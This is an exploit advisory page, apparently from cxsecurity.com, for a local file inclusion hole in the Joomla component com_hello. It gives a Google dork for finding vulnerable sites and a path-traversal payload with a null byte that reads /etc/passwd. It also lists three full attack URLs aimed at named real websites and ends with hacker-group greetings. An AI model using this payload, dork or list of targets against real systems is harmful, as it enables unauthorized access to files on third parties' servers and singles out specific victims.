Joomla Hello Local File Inclusion

2012.07.20
Credit: Ajax Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98
Dork: inurl:\"com_hello\"

################################################################################## # Title : Joomla Component com_hello Local File Include # # Author : Ajax Security Team # # Discovered By : devilzc0der & Dominator # # Dork : inurl:"com_hello" # # h0m3 : www.ajaxtm.com # # Software Link : www.joomla.com # # Level : High ################################################################################## # p0c : # com_hello&controller=../../../../../../../../etc/passwd%00 # # Please Use Null Byte ( %00 ) for Bypas . ################################################################################## # 3xample : # # http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 # # http://etm-proekt.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 # # http://a2-svz.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 ################################################################################### # Special TNX t0 : Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal ################################################################################### # GreetZ : black.shadowes - hadihadi - irsdl - Mormoroth - B@RBOD & All Iranian HackerZ ###################################################################################

References:

http://www.ajaxtm.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top